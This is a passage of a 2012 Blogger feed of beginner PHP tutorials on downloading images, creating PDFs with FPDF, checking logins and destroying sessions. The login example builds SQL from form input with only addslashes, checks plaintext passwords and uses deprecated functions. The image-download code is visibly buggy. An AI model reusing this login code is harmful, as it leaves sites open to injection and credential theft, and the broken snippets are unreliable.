<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;D0MASH09fyp7ImA9WhRbE0s.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072</id><updated>2012-02-04T06:24:09.367-08:00</updated><category term="PHP" /><category term="Games" /><category term="tricks" /><category term="Crack" /><category term="Songs" /><category term="MySQL" /><category term="Helpful_Info" /><category term="software" /><category term="Keygen" /><category term="stories" /><category term="Cool Tricks" /><category term="Dreamweaver" /><category term="Hacking Tutorials" /><category term="Photoshop" /><title>Nelson Desai</title><subtitle type="html">Well, you knew it was coming, right? I had to decide to do something for my friends as a favorite this holiday, because i have lots of fun to searching, and I think they come out beautifully. Besides that, they make awesome gifts, especially u also post on this, I hope you have a Happy Thanksgiving today.</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://nelsondesai.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>40</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/NelsonDesai" /><feedburner:info uri="nelsondesai" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>NelsonDesai</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;D0MASH0zfip7ImA9WhRbE0s.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-4331265306981113779</id><published>2012-02-04T06:24:00.000-08:00</published><updated>2012-02-04T06:24:09.386-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-02-04T06:24:09.386-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="MySQL" /><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><title>Download images from url php</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-M2uq5USjfyo/Ty00m8l6kKI/AAAAAAAABls/fKDsfdvnQn4/s1600/clean_urls.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="167" src="http://4.bp.blogspot.com/-M2uq5USjfyo/Ty00m8l6kKI/AAAAAAAABls/fKDsfdvnQn4/s320/clean_urls.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
First Select link from database or from any...&lt;br /&gt;
&lt;span style="color: red;"&gt;$url = "SELECT link FROM tablename";&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Now second step is check image is&amp;nbsp;available&amp;nbsp;on url or not..&lt;br /&gt;
we can check it by so many step i give hint at end of this post....&lt;br /&gt;
&lt;br /&gt;
// check url&amp;nbsp;available&amp;nbsp;using get_header method...&lt;br /&gt;
&lt;span style="color: red;"&gt;$url_head = get_headers($url)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;if($url_head == FALSE)&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;echo "URL or HEAD Unavailable.....";&lt;br /&gt;
&lt;span style="color: red;"&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;else&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;{&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;// now check url image hav not 404 error to download...&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;$head_chk = strpos ($url_head[0], '404 Not Found');&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp;if(&lt;/span&gt;&lt;span style="color: red;"&gt;$head_chk === FALSE&lt;/span&gt;&lt;span style="color: red;"&gt;)&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp;{&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;$image_data = file_get_contents($url); &lt;/span&gt;&amp;nbsp; // get content from url..&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;$image_name = basename($url); &lt;/span&gt;&amp;nbsp; // for save same name which in url.&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;$image__save_location = "/path/images_folder"; &amp;nbsp; &lt;/span&gt;// Save location or path.&lt;span style="color: red;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if(!$image_data)&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;{&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt; &amp;nbsp;// write some another image url like default image save if not available....&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;$no_image_data = "some default image url... if some image not&amp;nbsp;available&amp;nbsp;on url"&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt; &amp;nbsp;// now save image using file_put_contents function with same name which in url.&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;file_put_contents($image__save_location."/".$image_name, &amp;nbsp;$no_image_data);&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; }&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;else&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;{&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; file_put_contents($image__save_location."/".$image_name, &amp;nbsp;$image_data);&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;}&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;else&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;{&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;echo "404 and Image Not Available.......";&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;}&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------------&lt;br /&gt;
-----------------------------------------------------&lt;br /&gt;
You also check some other&amp;nbsp;condition like image avilabel or not in php&lt;br /&gt;
1. getimagesize($url);&lt;br /&gt;
2.&amp;nbsp;get_headers($url);&lt;br /&gt;
3. file_get_contents($url);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-4331265306981113779?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Htd9U13hgxKmjvzo2aU66u64zrw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Htd9U13hgxKmjvzo2aU66u64zrw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Htd9U13hgxKmjvzo2aU66u64zrw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Htd9U13hgxKmjvzo2aU66u64zrw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/aeQPOPZjYrI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/4331265306981113779/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2012/02/download-images-from-url-php.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/4331265306981113779?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/4331265306981113779?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/aeQPOPZjYrI/download-images-from-url-php.html" title="Download images from url php" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-M2uq5USjfyo/Ty00m8l6kKI/AAAAAAAABls/fKDsfdvnQn4/s72-c/clean_urls.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2012/02/download-images-from-url-php.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEcHSHgyfSp7ImA9WhRWGUk.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-406483245037388797</id><published>2012-01-07T05:09:00.000-08:00</published><updated>2012-01-07T05:13:59.695-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-07T05:13:59.695-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><title>How to create pdf file in php?</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-W2Tafh-DBHw/TwhDN9BegsI/AAAAAAAABlI/6eI7kKgEIIw/s1600/pdf_php-375x250.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="213" src="http://1.bp.blogspot.com/-W2Tafh-DBHw/TwhDN9BegsI/AAAAAAAABlI/6eI7kKgEIIw/s320/pdf_php-375x250.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
To create pdf file in php. we need to install some class.&lt;br /&gt;
this you can download from..&lt;br /&gt;
http://www.fpdf.org/en/download.php&lt;br /&gt;
&lt;br /&gt;
After download put it into your directory..&lt;br /&gt;
&lt;br /&gt;
and create a new file hello.php in that folder...&lt;br /&gt;
it important to your file make in this folder..[where fpdf.php will be save]&lt;br /&gt;
&lt;br /&gt;
now past this code in hello.php and save it..&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;lt; php&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;require('fpdf.php');&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;$pdf = new FPDF();&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;$pdf-&amp;gt;AddPage();&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;$pdf-&amp;gt;SetFont('Arial','B',16);&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;$pdf-&amp;gt;Cell(40,10,'Hello World!');&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;$pdf-&amp;gt;Output();&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&amp;nbsp;&amp;gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
In this code..&lt;br /&gt;
The &lt;span style="color: red;"&gt;FPDF()&lt;/span&gt; constructor is used here with the default values: pages are in A4 portrait.&lt;br /&gt;
You can change it by...&lt;br /&gt;
$pdf = new FPDF('P','mm','A4');&lt;br /&gt;
&lt;br /&gt;
Now There's no page at the moment, so we have to add one with &lt;span style="color: red;"&gt;AddPage()&lt;/span&gt;.&lt;br /&gt;
AddPage(oraientation, size)&lt;br /&gt;
Oraientation = P or Portrait, L or Landscape&lt;br /&gt;
&lt;br /&gt;
size: A3, A4, A5..&lt;br /&gt;
&lt;br /&gt;
Now before we can print text, it's mandatory to select a font with &lt;span style="color: red;"&gt;SetFont()&lt;/span&gt;, otherwise the document would be invalid. We choose Arial bold 16:&lt;br /&gt;
&lt;br /&gt;
Now We can now print a cell with &lt;span style="color: red;"&gt;Cell().&lt;/span&gt; A cell is a rectangular area, possibly framed, which contains a line of text.&lt;br /&gt;
Cell( w , h , txt , border , ln , align , fill , link)&lt;br /&gt;
w-width&lt;br /&gt;
&lt;br /&gt;
h-height&lt;br /&gt;
&lt;br /&gt;
txt-string&lt;br /&gt;
&lt;br /&gt;
border- 0=No border, 1=Frame&lt;br /&gt;
&lt;br /&gt;
ln- Indicates where the current position should go after the call [0-to the right, 1-to the beginning of next line, 2-below]&lt;br /&gt;
&lt;br /&gt;
align- L-left, R-Right, C-Center&lt;br /&gt;
&lt;br /&gt;
Fill- true=painted, false=transparent[default false.]&lt;br /&gt;
&lt;br /&gt;
link- URL&lt;br /&gt;
&lt;div&gt;
............&lt;/div&gt;
&lt;div&gt;
For Details of all class... See this links..&lt;/div&gt;
&lt;div&gt;
http://www.fpdf.org/en/doc/index.php&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-406483245037388797?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/dZsnSbJK3JO8yAZ_t9ll7I2KbNA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/dZsnSbJK3JO8yAZ_t9ll7I2KbNA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/dZsnSbJK3JO8yAZ_t9ll7I2KbNA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/dZsnSbJK3JO8yAZ_t9ll7I2KbNA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/9ByQdidVY_g" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/406483245037388797/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2012/01/how-to-create-pdf-file-in-php.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/406483245037388797?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/406483245037388797?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/9ByQdidVY_g/how-to-create-pdf-file-in-php.html" title="How to create pdf file in php?" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-W2Tafh-DBHw/TwhDN9BegsI/AAAAAAAABlI/6eI7kKgEIIw/s72-c/pdf_php-375x250.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2012/01/how-to-create-pdf-file-in-php.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkIASHsyfCp7ImA9WhRQGEU.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-8971482679899363063</id><published>2011-12-14T10:49:00.000-08:00</published><updated>2011-12-14T10:49:09.594-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-14T10:49:09.594-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="MySQL" /><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><title>login check in php</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;link href="images/shortcut icon ndr.png" rel="shortcut icon" type="image/x-icon"&gt;&lt;/link&gt; // For shot icon on tab//&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;script type="text/javascript"&gt;
&lt;/p&gt;
&lt;p&gt;
function validate()&lt;/p&gt;
&lt;p&gt;
{&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;u=document.getElementById("email").value;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;p=document.getElementById("password").value;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;var m;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;if(u=='' &amp;amp;&amp;amp; p=='')&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;{&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt;alert('Enter Email and Password');&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt;return false;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;}&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt; else if(u==''){&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt; alert('Enter email');&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt; return false;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt; }&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt; else if(p==''){&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt; alert('Enter password');&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt; return false;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;}else{&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt;  &lt;/span&gt;return true;&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;
&lt;span class="Apple-tab-span" style="white-space:pre"&gt; &lt;/span&gt;}&lt;/p&gt;
&lt;p&gt;
}&lt;/p&gt;
&lt;p&gt;

&lt;/script&gt;&lt;br /&gt;
&lt;!--?php&lt;/p--&gt;&lt;br /&gt;
include("config.php"); //connection file&lt;br /&gt;
include("lock.php"); //session check file&lt;br /&gt;
//include("logout.php");&lt;br /&gt;
&lt;br /&gt;
if($_SERVER["REQUEST_METHOD"] == "POST")&lt;br /&gt;
{&lt;br /&gt;
// username and password sent from Form&lt;br /&gt;
$myemail=addslashes($_POST['email']);&lt;br /&gt;
$mypassword=addslashes($_POST['password']);&lt;br /&gt;
&lt;br /&gt;
$sql="SELECT id FROM userdetails WHERE email='$myemail' and password='$mypassword'";&lt;br /&gt;
&lt;br /&gt;
$result=mysql_query($sql);&lt;br /&gt;
$count=mysql_num_rows($result);&lt;br /&gt;
$row=mysql_fetch_array($result);&lt;br /&gt;
$active=$row['active'];&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// If result matched $myusername and $mypassword, table row must be 1 row&lt;br /&gt;
if($count==1)&lt;br /&gt;
{&lt;br /&gt;
session_register("myemail");&lt;br /&gt;
$_SESSION['login_user']=$myemail;&lt;br /&gt;
&lt;br /&gt;
header("location:../home.php");&lt;br /&gt;
}&lt;br /&gt;
else&lt;br /&gt;
{&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;!--?php&amp;nbsp;&lt;/p--&gt;&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;form action="" method="post"&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;h2&gt;
Email Id :&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;input class="input" id="email" maxlength="2048" name="email" size="30" style="color: #8bbf36; font-size: 15px; margin-left: 15px;" type="text" /&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/h2&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;h3&gt;
Password :&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;input class="input" id="password" maxlength="2048" name="password" size="30" style="color: #8bbf36; font-size: 15px;" type="password" /&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/h3&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;h4&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;input &amp;nbsp;class="checkbox" id="remember_me" name="RememberMe" tabindex="3" type="checkbox" value="true" /&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Remember me on this computer&lt;/h4&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;input &amp;nbsp;="" id="submit" onclick="return validate();" type="submit" value="Login" /&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;/form&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-8971482679899363063?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ZOAOhZFHxXGRtwoDSDplmDmotcY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ZOAOhZFHxXGRtwoDSDplmDmotcY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ZOAOhZFHxXGRtwoDSDplmDmotcY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ZOAOhZFHxXGRtwoDSDplmDmotcY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/CQyC9j7OtUI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/8971482679899363063/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2011/12/login-check-in-php.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/8971482679899363063?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/8971482679899363063?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/CQyC9j7OtUI/login-check-in-php.html" title="login check in php" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2011/12/login-check-in-php.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkYDRnk7eyp7ImA9WhRQGEU.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-8042473785562126670</id><published>2011-12-14T10:42:00.001-08:00</published><updated>2011-12-14T10:42:57.703-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-14T10:42:57.703-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="MySQL" /><category scheme="http://www.blogger.com/atom/ns#" term="PHP" /><title>session destroy or unset in php</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;br /&gt;
session_start();&lt;br /&gt;
if(isset($_POST['logout'])){&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;session_destroy();&lt;br /&gt;
&lt;span class="Apple-tab-span" style="white-space: pre;"&gt; &lt;/span&gt;session_unset();&lt;br /&gt;
